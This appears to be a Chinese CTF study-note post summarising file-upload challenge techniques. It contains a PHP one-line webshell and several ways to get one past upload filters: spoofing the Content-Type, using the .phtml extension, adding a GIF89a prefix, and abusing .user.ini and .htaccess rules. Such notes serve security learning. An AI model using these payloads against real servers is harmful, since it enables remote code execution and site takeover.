第1-63题总结:文件上传篇

Posted 想学习安全的小白

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第1-63题总结:文件上传篇相关的知识,希望对你有一定的参考价值。

  1. 一句话木马:<?php @eval($_POST['pass']);?>
  2. Content-Type:image/png保持
  3. 后缀名绕过:phtml
  4. 添加图片前缀绕过内容检测:GIF89a? <script language="php">eval($_REQUEST[pass])</script>
  5. 利用.user.ini文件:GIF89a auto_prepend_file=pass.png,让可以访问的index.php加载一句话木马的图片格式,蚁剑连接index.php,eg:第二十三题
  6. .htaccess文件内容:将包含pass文件名的文件以php文件进行解析,蚁剑连接pass.png
<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>

以上是关于第1-63题总结:文件上传篇的主要内容,如果未能解决你的问题,请参考以下文章

第1-63题总结:SQL注入篇

第1-63题总结:SSTI模板注入篇

无穷小比阶(1.47-1.63)

LeetCode与《代码随想录》双指针篇:做题笔记与总结-JavaScript版

LeetCode与《代码随想录》数组篇:做题笔记与总结-Java版

LeetCode与《代码随想录》字符串篇:做题笔记与总结-JavaScript版